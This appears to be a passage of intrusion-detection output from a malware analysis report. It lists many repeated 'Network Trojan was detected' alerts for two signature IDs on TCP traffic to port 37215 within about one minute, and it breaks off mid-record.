                SID:2835222
                Source Port:55666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666523
                SID:2829579
                Source Port:45576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925996
                SID:2835222
                Source Port:46326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816406
                SID:2835222
                Source Port:59890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272634
                SID:2835222
                Source Port:51686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287196
                SID:2835222
                Source Port:33968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667442
                SID:2829579
                Source Port:57440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362986
                SID:2835222
                Source Port:42832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435015
                SID:2835222
                Source Port:38804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832630
                SID:2829579
                Source Port:34290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.589971
                SID:2835222
                Source Port:45120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.224452
                SID:2835222
                Source Port:50218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659843
                SID:2835222
                Source Port:58060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977267
                SID:2829579
                Source Port:36382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957770
                SID:2835222
                Source Port:56876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717305
                SID:2835222
                Source Port:51834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767026
                SID:2835222
                Source Port:43364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462509
                SID:2835222
                Source Port:34248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864507
                SID:2829579
                Source Port:58284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968282
                SID:2835222
                Source Port:48458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841062
                SID:2835222
                Source Port:37688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616311
                SID:2829579
                Source Port:41304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854326
                SID:2829579
                Source Port:55104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222487
                SID:2829579
                Source Port:59938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948268
                SID:2835222
                Source Port:44828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162562
                SID:2829579
                Source Port:41422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943972
                SID:2835222
                Source Port:56458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281387
                SID:2835222
                Source Port:49886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557895
                SID:2829579
                Source Port:37746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835963
                SID:2835222
                Source Port:58890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947591
                SID:2835222
                Source Port:37180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533168
                SID:2835222
                Source Port:54622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782692
                SID:2829579
                Source Port:39580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421385
                SID:2835222
                Source Port:58028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209722
                SID:2829579
                Source Port:60930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100823
                SID:2835222
                Source Port:36470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.606273
                SID:2829579
                Source Port:52814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518844
                SID:2829579
                Source Port:53038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.660317
                SID:2835222
                Source Port:50134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963949
                SID:2835222
                Source Port:42408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135550
                SID:2835222
                Source Port:39416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361354
                SID:2835222
                Source Port:52986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269347
                SID:2829579
                Source Port:58522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575751
                SID:2829579
                Source Port:57002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981512
                SID:2829579
                Source Port:44922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764346
                SID:2829579
                Source Port:46842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.802297
                SID:2829579
                Source Port:44816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267694
                SID:2835222
                Source Port:55184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014802
                SID:2829579
                Source Port:47852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.030394
                SID:2829579
                Source Port:48372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899493
                SID:2829579
                Source Port:55726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763643
                SID:2829579
                Source Port:32948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716067
                SID:2835222
                Source Port:45902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559694
                SID:2829579
                Source Port:50434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873457
                SID:2835222
                Source Port:59532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557912
                SID:2829579
                Source Port:50268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321955
                SID:2829579
                Source Port:49318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919570
                SID:2835222
                Source Port:58442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993672
                SID:2829579
                Source Port:55622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264850
                SID:2835222
                Source Port:50876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.962691
                SID:2829579
                Source Port:57114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025387
                SID:2835222
                Source Port:51626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160626
                SID:2835222
                Source Port:52388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980013
                SID:2829579
                Source Port:40252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170488
                SID:2835222
                Source Port:36146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610970
                SID:2835222
                Source Port:38012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361707
                SID:2835222
                Source Port:58138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640462
                SID:2829579
                Source Port:55238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276727
                SID:2829579
                Source Port:60128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845277
                SID:2829579
                Source Port:50636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942710
                SID:2835222
                Source Port:45736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.743537
                SID:2829579
                Source Port:37348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835877
                SID:2835222
                Source Port:57974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335409
                SID:2829579
                Source Port:34518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091154
                SID:2835222
                Source Port:36262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240277
                SID:2835222
                Source Port:40406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461301
                SID:2829579
                Source Port:42784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280998
                SID:2835222
                Source Port:49588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231263
                SID:2829579
                Source Port:46838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900664
                SID:2835222
                Source Port:34018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576094
                SID:2829579
                Source Port:36912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.102407
                SID:2829579
                Source Port:52516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264834
                SID:2829579
                Source Port:49476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.812947
                SID:2835222
                Source Port:45822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843857
                SID:2829579
                Source Port:37702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225473
                SID:2835222
                Source Port:57120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.276820
                SID:2829579
                Source Port:38378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.803082
                SID:2829579
                Source Port:42726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572123
                SID:2835222
                Source Port:50608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660224
                SID:2829579
                Source Port:53438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223812
                SID:2835222
                Source Port:37374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269054
                SID:2829579
                Source Port:57982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763044
                SID:2829579
                Source Port:60536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228435
                SID:2835222
                Source Port:56568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899229
                SID:2829579
                Source Port:38752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870471
                SID:2829579
                Source Port:34540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931205
                SID:2829579
                Source Port:40114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374517
                SID:2835222
                Source Port:44770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861948
                SID:2829579
                Source Port:50136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628294
                SID:2829579
                Source Port:36698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716270
                SID:2835222
                Source Port:49078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264548
                SID:2829579
                Source Port:33706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900427
                SID:2835222
                Source Port:40218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.940520
                SID:2835222
                Source Port:43946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013607
                SID:2835222
                Source Port:52404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612127
                SID:2835222
                Source Port:41974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262096
                SID:2835222
                Source Port:42154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718437
                SID:2835222
                Source Port:55924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765631
                SID:2835222
                Source Port:55566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990462
                SID:2829579
                Source Port:48794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180748
                SID:2835222
                Source Port:50744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654844
                SID:2829579
                Source Port:49300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643975
                SID:2829579
                Source Port:44924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842358
                SID:2835222
                Source Port:54618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575693
                SID:2829579
                Source Port:51108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.232508
                SID:2829579
                Source Port:51596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893956
                SID:2829579
                Source Port:39052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422573
                SID:2829579
                Source Port:40062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652239
                SID:2829579
                Source Port:35600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286653
                SID:2829579
                Source Port:52620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.239974
                SID:2829579
                Source Port:51112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372348
                SID:2835222
                Source Port:43642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.337309
                SID:2835222
                Source Port:45860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175160
                SID:2829579
                Source Port:35474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507247
                SID:2829579
                Source Port:36878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.365900
                SID:2835222
                Source Port:37806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914296
                SID:2835222
                Source Port:55022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684968
                SID:2835222
                Source Port:37880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948688
                SID:2829579
                Source Port:34920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967607
                SID:2829579
                Source Port:43706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173406
                SID:2829579
                Source Port:54056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532156
                SID:2829579
                Source Port:52226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669497
                SID:2829579
                Source Port:52166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586110
                SID:2829579
                Source Port:48994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421839
                SID:2835222
                Source Port:47314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.825914
                SID:2829579
                Source Port:60050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028000
                SID:2835222
                Source Port:41534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791675
                SID:2835222
                Source Port:59638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363434
                SID:2835222
                Source Port:58760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519782
                SID:2829579
                Source Port:56520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015408
                SID:2835222
                Source Port:43912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885697
                SID:2835222
                Source Port:55392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419966
                SID:2829579
                Source Port:50066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655644
                SID:2835222
                Source Port:38304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141509
                SID:2835222
                Source Port:51928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032418
                SID:2835222
                Source Port:36176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.428340
                SID:2835222
                Source Port:41188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643363
                SID:2829579
                Source Port:44158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512088
                SID:2835222
                Source Port:60248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510902
                SID:2835222
                Source Port:52112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.331054
                SID:2835222
                Source Port:47690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324552
                SID:2835222
                Source Port:52196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738297
                SID:2829579
                Source Port:46012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.453460
                SID:2829579
                Source Port:58798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660921
                SID:2835222
                Source Port:46530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816372
                SID:2829579
                Source Port:36318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278245
                SID:2835222
                Source Port:50492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842122
                SID:2829579
                Source Port:42284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111232
                SID:2835222
                Source Port:40892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574731
                SID:2835222
                Source Port:57310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716198
                SID:2829579
                Source Port:41920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.534192
                SID:2835222
                Source Port:60432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945556
                SID:2835222
                Source Port:35160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948650
                SID:2829579
                Source Port:43738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900258
                SID:2829579
                Source Port:36252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990685
                SID:2829579
                Source Port:45664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963066
                SID:2829579
                Source Port:60848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901958
                SID:2829579
                Source Port:58192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558186
                SID:2829579
                Source Port:37930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886253
                SID:2829579
                Source Port:35126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434892
                SID:2835222
                Source Port:38024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971790
                SID:2829579
                Source Port:52292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380341
                SID:2829579
                Source Port:45918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557790
                SID:2829579
                Source Port:43054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897581
                SID:2835222
                Source Port:36844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.863265
                SID:2835222
                Source Port:60054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.986437
                SID:2835222
                Source Port:51940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276180
                SID:2829579
                Source Port:43162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790978
                SID:2829579
                Source Port:48156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.552036
                SID:2829579
                Source Port:56088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.739070
                SID:2829579
                Source Port:36516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652698
                SID:2835222
                Source Port:57626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.729033
                SID:2829579
                Source Port:38018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507561
                SID:2835222
                Source Port:36352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994392
                SID:2835222
                Source Port:42344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845591
                SID:2835222
                Source Port:39426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.453374
                SID:2835222
                Source Port:33328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617326
                SID:2829579
                Source Port:56664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281986
                SID:2829579
                Source Port:42922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655269
                SID:2835222
                Source Port:35414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715067
                SID:2829579
                Source Port:34252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560972
                SID:2829579
                Source Port:56052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271269
                SID:2835222
                Source Port:57886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361397
                SID:2829579
                Source Port:50478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262122
                SID:2835222
                Source Port:52878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555198
                SID:2829579
                Source Port:59844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655854
                SID:2835222
                Source Port:42272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223756
                SID:2829579
                Source Port:34724
                Destination Port:37215
